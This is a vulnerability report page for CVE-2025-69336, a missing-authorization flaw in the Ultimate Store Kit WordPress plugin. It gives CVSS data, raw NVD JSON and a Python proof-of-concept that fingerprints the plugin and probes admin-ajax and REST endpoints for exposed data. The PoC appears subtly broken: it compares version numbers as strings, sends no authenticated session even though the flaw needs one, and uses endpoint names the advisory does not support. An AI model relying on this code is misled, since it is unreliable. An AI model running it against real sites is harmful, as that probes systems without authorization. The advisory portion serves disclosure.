Security Vulnerability Report
中文
CVE-2025-69336 CVSS 4.3 MEDIUM

CVE-2025-69336

Published: 2026-01-06 17:15:46
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in bdthemes Ultimate Store Kit Elementor Addons ultimate-store-kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Store Kit Elementor Addons: from n/a through <= 2.9.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ultimate-store-kit <= 2.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69336 PoC - Missing Authorization in Ultimate Store Kit # Target: WordPress site with ultimate-store-kit plugin <= 2.9.4 def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-69336 This vulnerability allows low-privilege users to access admin functions """ target = target_url.rstrip('/') # Step 1: Identify if the plugin is installed plugin_check = requests.get( f"{target}/wp-content/plugins/ultimate-store-kit/readme.txt", timeout=10 ) if 'ultimate-store-kit' not in plugin_check.text.lower(): print("[-] Plugin not found or readme.txt not accessible") return False # Step 2: Check plugin version version = None for line in plugin_check.text.split('\n'): if line.startswith('Stable tag:'): version = line.split(':')[1].strip() break if version and version <= '2.9.4': print(f"[+] Plugin version {version} is potentially vulnerable") else: print(f"[-] Plugin version {version} may not be vulnerable") return False # Step 3: Test unauthorized access to admin functions # This endpoint may expose sensitive data to low-privilege users endpoints = [ '/wp-admin/admin-ajax.php?action=usk_get_products', '/wp-admin/admin-ajax.php?action=usk_export_data', '/wp-json/usk/v1/products' ] vulnerable = False for endpoint in endpoints: try: response = requests.get( f"{target}{endpoint}", cookies={'wordpress_test_cookie': 'WP+Cookie+check'}, timeout=10 ) # Check if response indicates successful unauthorized access if response.status_code == 200 and 'data' in response.text: print(f"[+] Potentially vulnerable endpoint: {endpoint}") print(f"[+] Response preview: {response.text[:200]}...") vulnerable = True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return vulnerable if __name__ == '__main__': if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing {target} for CVE-2025-69336") if check_vulnerability(target): print("[+] Target appears to be vulnerable to CVE-2025-69336") else: print("[-] Target does not appear to be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69336", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:46.463", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in bdthemes Ultimate Store Kit Elementor Addons ultimate-store-kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Store Kit Elementor Addons: from n/a through <= 2.9.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ultimate-store-kit/vulnerability/wordpress-ultimate-store-kit-elementor-addons-plugin-2-9-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}